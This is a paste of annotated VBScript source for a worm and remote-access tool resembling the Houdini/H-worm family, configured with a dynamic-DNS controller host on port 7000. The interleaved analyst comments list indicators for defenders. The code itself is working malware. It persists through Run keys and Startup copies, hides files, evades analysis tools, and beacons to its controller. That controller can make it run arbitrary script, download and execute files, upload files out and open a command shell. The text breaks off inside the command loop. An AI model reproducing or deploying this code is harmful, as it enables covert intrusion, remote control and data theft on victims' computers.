mariacdt

wor7000

Jun 24th, 2019
  1.  
  ' ANALYST NOTE: builder-generated configuration and start-up code of a VBScript worm / remote-access script.
  ' The command names handled further down ("excecute", "site-send", "enum-faf", ...) resemble the publicly
  ' documented Houdini/H-worm family; this page alone does not establish attribution.
  ' GOBO_KYTUSAI_HAM is defined outside this excerpt; every name option below is passed an empty string,
  ' so the fallbacks later in this block (use the script's own file name) decide the installed names.
  2. DT_ID_CHO_PC = Trim(GOBO_KYTUSAI_HAM("")) 'Name for Machine ID (Recommend: Should enter)
  3. DT_TENSAUCAIDAT = Trim(GOBO_KYTUSAI_HAM("")) & ".vbs" 'The worm Name after it installed (Recommend: Should enter)
  4. DT_USER_DANGKY = GOBO_KYTUSAI_HAM("") 'Name of User Registry (Recommend: Should enter. And choose a UNIQUE NAME to use for the Worm update times)
  5. DT_THUMUCCON_INS = Trim(GOBO_KYTUSAI_HAM("")) 'Name of Install subFolder - Tip: Do not use folder name same any folder of System
  6. DT_MACHINE_DANGKY = GOBO_KYTUSAI_HAM("") 'Name of Machine Registry
  7. DT_SSTTAARRTTUUPP_FN = Trim(GOBO_KYTUSAI_HAM("")) & ".vbs" 'Name of Install Startup
  8. DT_USB_SSD_FN = Trim(GOBO_KYTUSAI_HAM("")) & ".vbs" 'Name of USB Spread file
  9. DT_FOLDER_IN_TEMP = Trim(GOBO_KYTUSAI_HAM("")) 'Name of Temp subFolder
  ' Feature switches. In this sample only BATTAT_ANTI1 (analysis-tool check) and BATTAT_XOARAC (temp cleanup)
  ' are on; the VM check, the second tool check and the USB shortcut lures are off.
  10. BATTAT_CHONG_MAYAO = false 'Anti Virtual Machines - default false
  11. BATTAT_CHOPCAT_FILEMAN = false 'Anti Sandbox, tracking,... - default false
  12. BATTAT_LAYLAN_LINKTAPTIN_USB = false
  13. BATTAT_LAYLAN_LINKTHUMUC_USB = false
  14. TF_HIEN_TMUCSFILES_USB = true 'Hide/Show for files/Folders which already exits in USB - (true = Show it; false = Hide it; default - true)
  15. BATTAT_ANTI1 = true 'Antis 1 - default true
  16. BATTAT_ANTI2 = false 'Antis 2 - default false
  17. BATTAT_XOARAC = true 'Delete temp files/subFolders of system, user TEMP/IE - default true
  ' Network indicators: the controller host (a duckdns.org dynamic-DNS name) and TCP port used for every
  ' HTTP request this script makes. Suitable for DNS/proxy/firewall hunting and blocking.
  18. DIACHI_KETNOI = "microsoftoutlook.duckdns.org"
  19. CONG_KETNOI = 7000
  20. GALAXY = "%temp%"
  21. THOIGIAN_CAIDAT = 1 'Set the delay to connecting (milisecond, 1000 = 1s)
  22. DDANMACDINH_CAIDATSAU = GALAXY & "\" & DT_THUMUCCON_INS
  ' Poll interval in milliseconds (used by the main loop's wscript.sleep) and the field separator "<|>"
  ' used in both directions of the protocol.
  23. THOIGIAN_LAMTUOI = 4914
  24. MK = "<" & "|" & ">"
  25. WS_CODENAME = wscript.scriptname
  26. WS_FCODENAME = wscript.scriptfullname
  27. COHAYKO_TU_USB = ""
  28. dim OBJ_WSSHELL,OBJ_HTHONG_TTIN,MANGCUATUI,KETNOI_DA_SANSANG,LENHTHUCTHI,TSO_CHO_LENHTHUCTHI,THEFIRST_CHOCAPNHAT
  29. dim OBJ_SYS_ENV,OBJ_USER_ENV,STR_THUMUC_FILETAM_IE
  ' COM objects used throughout: WScript.Shell (registry, process launch), FileSystemObject (file operations),
  ' MSXML2.XMLHTTP (HTTP) and two WMI connections to root\cimv2.
  30. set OBJ_WSSHELL = wscript.createobject("wscript.shell")
  31. set OBJ_HTHONG_TTIN = createobject("scripting.filesystemobject")
  32. set MANGCUATUI = createobject("msxml2.xmlhttp")
  33. set OBJ_SYS_ENV = OBJ_WSSHELL.Environment("System")
  34. set OBJ_USER_ENV = OBJ_WSSHELL.Environment("User")
  35. set DT_WMG_DOT = getobject("winmgmts:\\.\root\cimv2")
  36. set DT_WMG_IMP = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  37. TRUYVAN_PROC = "select * from win32_process where name="
  38. DDAN_SSTTAARRTTUUPP_CUR = OBJ_WSSHELL.specialfolders("startup") & "\"
  39. DDAN_SSTTAARRTTUUPP_ALL = OBJ_WSSHELL.specialfolders("AllUsersStartup") & "\"
  40. STR_DUONGDAN_USER_TEMP = OBJ_WSSHELL.ExpandEnvironmentStrings(OBJ_USER_ENV("TEMP"))
  41. STR_DUONGDAN_SYS_TEMP = OBJ_WSSHELL.ExpandEnvironmentStrings(OBJ_SYS_ENV("TEMP"))
  42. STR_USER_PROFILE = OBJ_WSSHELL.ExpandEnvironmentStrings("%userprofile%")
  ' Install location: %temp%\<subfolder> when a subfolder name is configured, otherwise %temp% itself.
  43. if DT_THUMUCCON_INS = "" Or DT_THUMUCCON_INS = " " then
  44. DDANMACDINH_CAIDATSAU = GALAXY
  45. else
  46. if not OBJ_HTHONG_TTIN.folderexists(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\" & DT_THUMUCCON_INS) then
  47. OBJ_HTHONG_TTIN.CreateFolder(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\" & DT_THUMUCCON_INS)
  48. wscript.sleep 100
  49. end if
  50. end if
  ' Fallbacks: any unset file name becomes the running script's own file name, and unset registry value
  ' names become that file name without its extension. Responders should therefore look for Run values
  ' and Startup-folder .vbs files named after the dropped script.
  51. if (DT_TENSAUCAIDAT = "" & ".vbs") Or (DT_TENSAUCAIDAT = " " & ".vbs") then DT_TENSAUCAIDAT = WS_CODENAME
  52. if (DT_SSTTAARRTTUUPP_FN = "" & ".vbs") Or (DT_SSTTAARRTTUUPP_FN = " " & ".vbs") then DT_SSTTAARRTTUUPP_FN = WS_CODENAME
  53. if (DT_USB_SSD_FN = "" & ".vbs") Or (DT_USB_SSD_FN = " " & ".vbs") then DT_USB_SSD_FN = WS_CODENAME
  54. if DT_USER_DANGKY = "" then DT_USER_DANGKY = split(WS_CODENAME,".")(0)
  55. if DT_MACHINE_DANGKY = "" then DT_MACHINE_DANGKY = split(WS_CODENAME,".")(0)
  56. THUMUC_CAIDAT_SAU = OBJ_WSSHELL.expandenvironmentstrings(DDANMACDINH_CAIDATSAU) & "\"
  57. if not OBJ_HTHONG_TTIN.folderexists(THUMUC_CAIDAT_SAU) then THUMUC_CAIDAT_SAU = OBJ_WSSHELL.expandenvironmentstrings("%temp%") & "\"
  ' Script-level error suppression from here on: failures in the main loop are silently skipped.
  58. on error resume next
  ' Entry point: install/persistence routine defined immediately below.
  59. TREES_HAM
  ' ANALYST NOTE: start-up routine. Runs the optional environment checks, records an infection-origin marker
  ' in the registry, installs persistence (CAIDATVAOMAY_SUB) and hands over to the installed copy.
  60. function TREES_HAM
  61. on error resume next
  62. if BATTAT_CHONG_MAYAO then CHONGMAYAO_HAM()
  63. if BATTAT_CHOPCAT_FILEMAN then CHOPCAT_FILEMAN_HAM()
  ' Marker under HKCU\Software\<MAHW_HAM value + registry name>\ (MAHW_HAM is defined outside this excerpt).
  ' It is written once and holds "true - <date>" when the script was first started from the root of a drive
  ' (full path of the form X:\<script name>), otherwise "false - <date>". The value is later appended to the
  ' host fingerprint sent to the controller, so it is a useful artefact for dating the first execution.
  64. COHAYKO_TU_USB = OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\" & MAHW_HAM & split(DT_USER_DANGKY,".")(0) & "\")
  65. if COHAYKO_TU_USB = "" then
  66. if lcase(mid(WS_FCODENAME,2)) = ":\" & lcase(WS_CODENAME) then
  67. COHAYKO_TU_USB = "true - " & date
  68. OBJ_WSSHELL.regwrite "HKEY_CURRENT_USER\Software\" & MAHW_HAM & split(DT_USER_DANGKY,".")(0) & "\", COHAYKO_TU_USB, "REG_SZ"
  69. else
  70. COHAYKO_TU_USB = "false - " & date
  71. OBJ_WSSHELL.regwrite "HKEY_CURRENT_USER\Software\" & MAHW_HAM & split(DT_USER_DANGKY,".")(0) & "\", COHAYKO_TU_USB, "REG_SZ"
  72. end if
  73. end if
  ' Working folder for downloaded files under the user's TEMP directory.
  74. if not OBJ_HTHONG_TTIN.FolderExists(STR_DUONGDAN_USER_TEMP & "\" & DT_FOLDER_IN_TEMP) then
  75. OBJ_HTHONG_TTIN.CreateFolder(STR_DUONGDAN_USER_TEMP & "\" & DT_FOLDER_IN_TEMP)
  76. wscript.sleep 44
  77. end if
  78. CAIDATVAOMAY_SUB
  ' If this instance is not the installed copy, start the installed copy with "wscript.exe //B" (batch mode,
  ' no script error dialogs). Process-creation telemetry showing wscript.exe //B launching a .vbs from
  ' %temp% is a detection opportunity.
  79. set RUTGON_FNAME = OBJ_HTHONG_TTIN.getfile(WS_FCODENAME)
  80. set RUTGON_FNAME_DACAI = OBJ_HTHONG_TTIN.getfile(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT)
  81. if lcase(RUTGON_FNAME.shortpath) <> lcase(RUTGON_FNAME_DACAI.shortpath) then
  82. wscript.sleep THOIGIAN_CAIDAT
  83. OBJ_WSSHELL.run "wscript.exe //B " & chr(34) & THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT & chr(34)
  84. end if
  ' Opens the installed file for appending (mode 8, Unicode) and keeps the handle in a script-level variable;
  ' quits if the open fails. NOTE(review): presumably this acts as a single-instance guard, with a second
  ' instance failing to open the file already held by the first - confirm by observation.
  85. err.clear
  86. set THEFIRST_CHOCAPNHAT = OBJ_HTHONG_TTIN.opentextfile(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT,8,false,-1)
  87. if err.number > 0 then wscript.quit
  88. end function
  ' ANALYST NOTE: virtual-machine check (disabled in this sample's configuration). Queries WMI
  ' Win32_ComputerSystemProduct and, if a product name contains "virtual", deletes the running script file
  ' and exits. When analysing a build with this switch enabled, expect the sample to remove itself on
  ' hypervisors whose product name matches.
  89. function CHONGMAYAO_HAM()
  90. on error resume next
  91. set OBJ_WMI_WCSP = GetObject("WinMgmts:")
  92. set COT_WCSP = OBJ_WMI_WCSP.ExecQuery("Select * from Win32_ComputerSystemProduct")
  93. for each BOOBS in COT_WCSP
  94. if instr(lcase(BOOBS.name),"virtual") > 0 then
  95. on error resume next
  96. OBJ_HTHONG_TTIN.deletefile(WS_FCODENAME)
  ' THOAT_XAC calls wscript.quit, so the loop body runs at most once in practice.
  97. do
  98. THOAT_XAC
  99. loop
  100. end if
  101. next
  102. set OBJ_WMI_WCSP = nothing
  103. end function
  ' ANALYST NOTE: sandbox / monitoring-tool check (disabled in this sample's configuration). Runs one WMI
  ' win32_process query per tool name and exits when a query returns exactly one process (Count=1).
  ' A burst of win32_process queries for analysis-tool names issued by wscript.exe is itself a behavioural
  ' indicator that WMI activity logging can surface.
  104. function CHOPCAT_FILEMAN_HAM
  105. set TTR_KOCAI_KOCHAY_1 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'SandboxieRpcSs.exe'")
  106. set TTR_KOCAI_KOCHAY_2 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'ProcessHacker.exe'")
  107. set TTR_KOCAI_KOCHAY_3 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'FileMonitor.exe'")
  108. set TTR_KOCAI_KOCHAY_4 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'Procmon.exe'")
  109. set TTR_KOCAI_KOCHAY_5 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'SysTracer.exe'")
  110. set TTR_KOCAI_KOCHAY_6 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'SpyTheSpy.exe'")
  111. if TTR_KOCAI_KOCHAY_1.Count=1 then
  112. THOAT_XAC
  113. elseif TTR_KOCAI_KOCHAY_2.Count=1 then
  114. THOAT_XAC
  115. elseif TTR_KOCAI_KOCHAY_3.Count=1 then
  116. THOAT_XAC
  117. elseif TTR_KOCAI_KOCHAY_4.Count=1 then
  118. THOAT_XAC
  119. elseif TTR_KOCAI_KOCHAY_5.Count=1 then
  120. THOAT_XAC
  121. elseif TTR_KOCAI_KOCHAY_6.Count=1 then
  122. THOAT_XAC
  123. end if
  124. end function
  ' ANALYST NOTE: host-profiling helper. Returns false when the PromptOnSecureDesktop policy value reads 0
  ' and true otherwise. The result is reported to the controller as the "On"/"Off" field of the host
  ' fingerprint. It reads the secure-desktop prompt setting only, so it is a proxy for the UAC state
  ' rather than a direct check of it.
  125. function UAC_DABAT_HAM()
  126. on error resume next
  127. if OBJ_WSSHELL.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop")=0 then
  128. UAC_DABAT_HAM = false
  129. else
  130. UAC_DABAT_HAM = true
  131. end if
  132. end function
  ' ANALYST NOTE: persistence and concealment. Called at start-up and again at the end of every USB pass,
  ' so removed artefacts are re-created while the script is running - terminate the wscript.exe process
  ' before cleaning up. Artefacts created here, all visible in the lines below:
  '   - Explorer settings ShowSuperHidden=0 and HideFileExt=1 for the current user
  '   - Run values in HKCU and HKLM launching wscript.exe //B "<install path>"
  '   - a copy in the install folder (hidden + system) and copies in both Startup folders (system)
  133. sub CAIDATVAOMAY_SUB()
  134. on error resume next
  ' Hide protected operating-system files and hide file extensions in Explorer, so hidden+system copies
  ' are not shown and the .vbs extension is not displayed.
  135. if OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden")="1" Or OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden")<>0 then
  136. OBJ_WSSHELL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
  137. end if
  138. if OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt")="0" Or OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt")="" then
  139. OBJ_WSSHELL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt",1,"REG_DWORD"
  140. end if
  ' Autostart entries. The HKLM write is attempted unconditionally; errors are suppressed, so whether it
  ' succeeds depends on the privileges of the running user.
  141. OBJ_WSSHELL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & DT_USER_DANGKY, "wscript.exe //B " & chrw(34) & THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT & chrw(34),"REG_SZ"
  142. OBJ_WSSHELL.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" & DT_MACHINE_DANGKY, "wscript.exe //B " & chrw(34) & THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT & chrw(34),"REG_SZ"
  ' File attribute values: 2 = hidden, 4 = system.
  143. if lcase(THUMUC_CAIDAT_SAU) <> lcase(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\") then
  144. if OBJ_HTHONG_TTIN.folderexists(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\" & DT_THUMUCCON_INS) then
  145. OBJ_HTHONG_TTIN.getfolder(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\" & DT_THUMUCCON_INS).attributes=2+4
  146. end if
  147. end if
  148. if not OBJ_HTHONG_TTIN.fileexists(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT) then
  149. OBJ_HTHONG_TTIN.copyfile WS_FCODENAME,THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT,true
  150. wscript.sleep 10
  151. OBJ_HTHONG_TTIN.GetFile(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT).Attributes=2+4
  152. end if
  153. if not OBJ_HTHONG_TTIN.fileexists(DDAN_SSTTAARRTTUUPP_CUR & DT_SSTTAARRTTUUPP_FN) then
  154. OBJ_HTHONG_TTIN.copyfile WS_FCODENAME,DDAN_SSTTAARRTTUUPP_CUR & DT_SSTTAARRTTUUPP_FN,true
  155. wscript.sleep 10
  156. OBJ_HTHONG_TTIN.GetFile(DDAN_SSTTAARRTTUUPP_CUR & DT_SSTTAARRTTUUPP_FN).Attributes=0+4
  157. end if
  158. if not OBJ_HTHONG_TTIN.fileexists(DDAN_SSTTAARRTTUUPP_ALL & DT_SSTTAARRTTUUPP_FN) then
  159. OBJ_HTHONG_TTIN.copyfile WS_FCODENAME,DDAN_SSTTAARRTTUUPP_ALL & DT_SSTTAARRTTUUPP_FN,true
  160. wscript.sleep 10
  161. OBJ_HTHONG_TTIN.GetFile(DDAN_SSTTAARRTTUUPP_ALL & DT_SSTTAARRTTUUPP_FN).Attributes=0+4
  162. end if
  ' Optional cleanup of the user/system TEMP folders and the IE cache through XOA_TEMP_SAU_X_NGAY_SUB,
  ' which is defined outside this excerpt. Forensic note: this can remove unrelated temporary files that
  ' would otherwise be evidence.
  163. if BATTAT_XOARAC then
  164. XOA_TEMP_SAU_X_NGAY_SUB STR_DUONGDAN_USER_TEMP
  165. XOA_TEMP_SAU_X_NGAY_SUB STR_DUONGDAN_SYS_TEMP
  166. STR_THUMUC_FILETAM_IE = STR_USER_PROFILE & "\AppData\Local\Microsoft\Windows\Temporary Internet Files"
  167. XOA_TEMP_SAU_X_NGAY_SUB STR_THUMUC_FILETAM_IE
  168. STR_THUMUC_FILETAM_IE = STR_THUMUC_FILETAM_IE & "\Content.IE5"
  169. XOA_TEMP_SAU_X_NGAY_SUB STR_THUMUC_FILETAM_IE
  170. end if
  171. end sub
  ' ANALYST NOTE: handler for the controller's "uninstall" command. It removes the script's own registry
  ' values, Startup copies, installed copy and removable-drive copies, then exits. It doubles as a checklist
  ' of the artefacts an incident responder should verify are gone. Two side effects to be aware of:
  '   - the Explorer settings are written to the same hiding values again (ShowSuperHidden=0, HideFileExt=1),
  '     not restored, so they must be reset manually;
  '   - every .lnk file in the root of a removable drive is deleted, not only shortcuts this script created.
  172. sub GOBO_SUB
  173. on error resume next
  174. dim TEN_FILE_IN_USB
  175. if lcase(THUMUC_CAIDAT_SAU) <> lcase(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\") then
  176. OBJ_HTHONG_TTIN.getfolder(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\" & DT_THUMUCCON_INS).attributes=0
  177. end if
  178. OBJ_HTHONG_TTIN.GetFile(WS_FCODENAME).Attributes=0
  179. OBJ_HTHONG_TTIN.GetFile(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT).Attributes=0
  ' Release the handle opened in TREES_HAM so the installed file can be deleted.
  180. THEFIRST_CHOCAPNHAT.close
  181. OBJ_WSSHELL.regdelete "HKEY_CURRENT_USER\Software\" & MAHW_HAM & split(DT_USER_DANGKY,".")(0) & "\"
  182. OBJ_WSSHELL.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & DT_USER_DANGKY
  183. OBJ_WSSHELL.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" & DT_MACHINE_DANGKY
  184. OBJ_HTHONG_TTIN.deletefile DDAN_SSTTAARRTTUUPP_CUR & DT_SSTTAARRTTUUPP_FN,true
  185. OBJ_HTHONG_TTIN.deletefile DDAN_SSTTAARRTTUUPP_ALL & DT_SSTTAARRTTUUPP_FN,true
  186. OBJ_HTHONG_TTIN.deletefile WS_FCODENAME,true
  187. OBJ_HTHONG_TTIN.deletefile THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT,true
  188. if OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden")="1" Or OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden")<>0 then
  189. OBJ_WSSHELL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
  190. end if
  191. if OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt")="0" Or OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt")="" then
  192. OBJ_WSSHELL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt",1,"REG_DWORD"
  193. end if
  ' XOA_FILEVAFOLDER_SUB is defined outside this excerpt; from its use here it is applied to whole
  ' directories (TEMP folders and the IE cache) - confirm its exact behaviour against the full sample.
  194. if BATTAT_XOARAC then
  195. XOA_FILEVAFOLDER_SUB STR_DUONGDAN_USER_TEMP
  196. XOA_FILEVAFOLDER_SUB STR_DUONGDAN_SYS_TEMP
  197. STR_THUMUC_FILETAM_IE = STR_USER_PROFILE & "\AppData\Local\Microsoft\Windows\Temporary Internet Files"
  198. XOA_FILEVAFOLDER_SUB STR_THUMUC_FILETAM_IE
  199. STR_THUMUC_FILETAM_IE = STR_THUMUC_FILETAM_IE & "\Content.IE5"
  200. XOA_FILEVAFOLDER_SUB STR_THUMUC_FILETAM_IE
  201. end if
  ' Removable drives only (drivetype = 1): clear attributes on root files and folders, delete the shortcut
  ' that shares a base name with each file, delete all .lnk files and delete the script's own copy.
  202. for each CAC_USB in OBJ_HTHONG_TTIN.drives
  203. if CAC_USB.isready = true then
  204. if CAC_USB.freespace > 0 then
  205. if CAC_USB.drivetype = 1 then
  206. for each TAPTIN_DACO_IN_USB in OBJ_HTHONG_TTIN.getfolder(CAC_USB.path & "\").files
  207. on error resume next
  208. if instr(TAPTIN_DACO_IN_USB.name,".") then
  209. if lcase(split(TAPTIN_DACO_IN_USB.name, ".")(ubound(split(TAPTIN_DACO_IN_USB.name, ".")))) <> "lnk" then
  210. TAPTIN_DACO_IN_USB.attributes=0
  211. if ucase(TAPTIN_DACO_IN_USB.name) <> ucase(DT_USB_SSD_FN) then
  212. TEN_FILE_IN_USB = split(TAPTIN_DACO_IN_USB.name,".")
  213. OBJ_HTHONG_TTIN.deletefile(CAC_USB.path & "\" & TEN_FILE_IN_USB(0) & ".lnk")
  214. else
  215. OBJ_HTHONG_TTIN.deletefile(CAC_USB.path & "\" & TAPTIN_DACO_IN_USB.name)
  216. end if
  217. else
  218. OBJ_HTHONG_TTIN.deletefile(TAPTIN_DACO_IN_USB.path)
  219. end if
  220. end if
  221. OBJ_HTHONG_TTIN.DeleteFile CAC_USB.path & "\" & DT_USB_SSD_FN,true
  222. next
  223. for each THUMUC_DACO_IN_USB in OBJ_HTHONG_TTIN.getfolder(CAC_USB.path & "\").subfolders
  224. THUMUC_DACO_IN_USB.attributes=0
  225. next
  226. end if
  227. end if
  228. end if
  229. next
  230. if lcase(THUMUC_CAIDAT_SAU) <> lcase(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\") then
  231. OBJ_HTHONG_TTIN.deletefolder OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\" & DT_THUMUCCON_INS,true
  232. end if
  233. OBJ_HTHONG_TTIN.deletefolder STR_DUONGDAN_USER_TEMP & "\" & DT_FOLDER_IN_TEMP,true
  234. wscript.quit
  235. end sub
  ' ANALYST NOTE: cleanup that runs before a controller-initiated "update". Removes the registry marker,
  ' both Run values, the Startup copies and the copies on removable drives; the installed file itself is
  ' kept (only its attributes are cleared) because the update handler overwrites it in place.
  ' XOA_FILEVAFOLDER_SUB (defined outside this excerpt) is applied to both Startup folders as a whole;
  ' NOTE(review): if it deletes folder contents, unrelated Startup items are lost as well - confirm.
  236. sub GOBO_CAPNHAT_SUB()
  237. on error resume next
  238. if lcase(THUMUC_CAIDAT_SAU) <> lcase(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\") then
  239. OBJ_HTHONG_TTIN.getfolder(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\" & DT_THUMUCCON_INS).attributes=0
  240. end if
  241. OBJ_HTHONG_TTIN.GetFile(WS_FCODENAME).Attributes=0
  242. OBJ_HTHONG_TTIN.GetFile(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT).Attributes=0
  243. OBJ_WSSHELL.regdelete "HKEY_CURRENT_USER\Software\" & MAHW_HAM & split(DT_USER_DANGKY,".")(0) & "\"
  244. OBJ_WSSHELL.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & DT_USER_DANGKY
  245. OBJ_WSSHELL.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" & DT_MACHINE_DANGKY
  246. XOA_FILEVAFOLDER_SUB DDAN_SSTTAARRTTUUPP_CUR
  247. XOA_FILEVAFOLDER_SUB DDAN_SSTTAARRTTUUPP_ALL
  248. OBJ_HTHONG_TTIN.deletefile DDAN_SSTTAARRTTUUPP_CUR & DT_SSTTAARRTTUUPP_FN,true
  249. OBJ_HTHONG_TTIN.deletefile DDAN_SSTTAARRTTUUPP_ALL & DT_SSTTAARRTTUUPP_FN,true
  250. for each CAC_USB in OBJ_HTHONG_TTIN.drives
  251. if CAC_USB.isready = true then
  252. if CAC_USB.freespace > 0 then
  253. if CAC_USB.drivetype = 1 then
  254. for each TAPTIN_DACO_IN_USB in OBJ_HTHONG_TTIN.getfolder(CAC_USB.path & "\").files
  255. on error resume next
  256. OBJ_HTHONG_TTIN.DeleteFile CAC_USB.path & "\" & DT_USB_SSD_FN,true
  257. next
  258. end if
  259. end if
  260. end if
  261. next
  262. err.clear
  263. end sub
  ' ANALYST NOTE: main command loop. Each pass runs the enabled analysis-tool checks, refreshes the
  ' removable-drive copies and persistence, then sends an HTTP POST to /is-ready on the configured host and
  ' port and treats the response text as "<command><|><arg1><|><arg2>". The loop sleeps THOIGIAN_LAMTUOI
  ' milliseconds between polls, so network monitoring should show a regular POST beacon to /is-ready.
  ' The protocol is plain HTTP, so request paths and bodies are inspectable at a proxy or in a capture.
  264. while true
  265. if BATTAT_ANTI1 then ROUTER_MOT()
  266. if BATTAT_ANTI2 then ROUTER_HAI()
  267. CAIDATVAOUSB_SUB
  268. KETNOI_DA_SANSANG = ""
  269. KETNOI_DA_SANSANG = THANKGOD_YOUAREHERE("is-ready","")
  270. LENHTHUCTHI = split(KETNOI_DA_SANSANG,MK)
  271. select case LENHTHUCTHI(0)
  ' "excecute" (spelled as in the sample): the argument is run as VBScript source via Execute, i.e. the
  ' controller can run arbitrary script code in this process.
  272. case "excecute"
  273. TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
  274. execute TSO_CHO_LENHTHUCTHI
  ' "update": the installed script is overwritten with text supplied by the controller (mode 2 = write,
  ' Unicode), relaunched, re-hidden, and this instance exits. File hashes of the installed copy can
  ' therefore change over the lifetime of an infection.
  275. case "update"
  276. TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
  277. THEFIRST_CHOCAPNHAT.close
  278. GOBO_CAPNHAT_SUB
  279. set THEFIRST_CHOCAPNHAT = OBJ_HTHONG_TTIN.opentextfile(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT,2,false,-1)
  280. THEFIRST_CHOCAPNHAT.write TSO_CHO_LENHTHUCTHI
  281. THEFIRST_CHOCAPNHAT.close
  282. OBJ_WSSHELL.run "wscript.exe //B " & chr(34) & THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT & chr(34)
  283. OBJ_HTHONG_TTIN.getfile(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT).attributes=2+4
  284. wscript.quit
  285. case "uninstall"
  286. GOBO_SUB
  ' "send" / "site-send": fetch a file (from the controller, or from a URL the controller names), write
  ' it under the user's TEMP folder and run it.
  287. case "send"
  288. DUAFILELEN_VIC_ROICHAY_SUB LENHTHUCTHI(1),LENHTHUCTHI(2)
  289. case "site-send"
  290. LAY_FILETHEO_URL_VA_THUCTHI_SUB LENHTHUCTHI(1),LENHTHUCTHI(2)
  ' "recv": upload a local file to the controller (data exfiltration).
  291. case "recv"
  292. TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
  293. LAY_FILE_VENHA_FILEMAN_HAM(TSO_CHO_LENHTHUCTHI)
  ' Enumeration commands: drives, directory listing, process list. Results are POSTed back to
  ' /is-enum-driver, /is-enum-faf and /is-enum-process respectively.
  294. case "enum-driver"
  295. THANKGOD_YOUAREHERE "is-enum-driver",LAYCACODIA_HAM
  296. case "enum-faf"
  297. TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
  298. THANKGOD_YOUAREHERE "is-enum-faf",CACTHUMUC_HAM(TSO_CHO_LENHTHUCTHI)
  299. case "enum-process"
  300. THANKGOD_YOUAREHERE "is-enum-process",CACTIENTRINH_HAM
  ' "cmd-shell": run a command line through %comspec% and POST its output to /is-cmd-shell.
  301. case "cmd-shell"
  302. TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
  303. THANKGOD_YOUAREHERE "is-cmd-shell",DIEUKHIEN_CMD_HAM(TSO_CHO_LENHTHUCTHI)
  304. case "delete"
  305. TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
  306. XOA_TAPTIN_VA_THUMUC_SUB(TSO_CHO_LENHTHUCTHI)
  307. case "exit-process"
  308. TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
  309. TAT_TIENTRINH_SUB(TSO_CHO_LENHTHUCTHI)
  ' "sleep": the new poll interval is obtained by passing the controller's text to Eval, so the beacon
  ' period observed on the network can change at the controller's request.
  310. case "sleep"
  311. TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
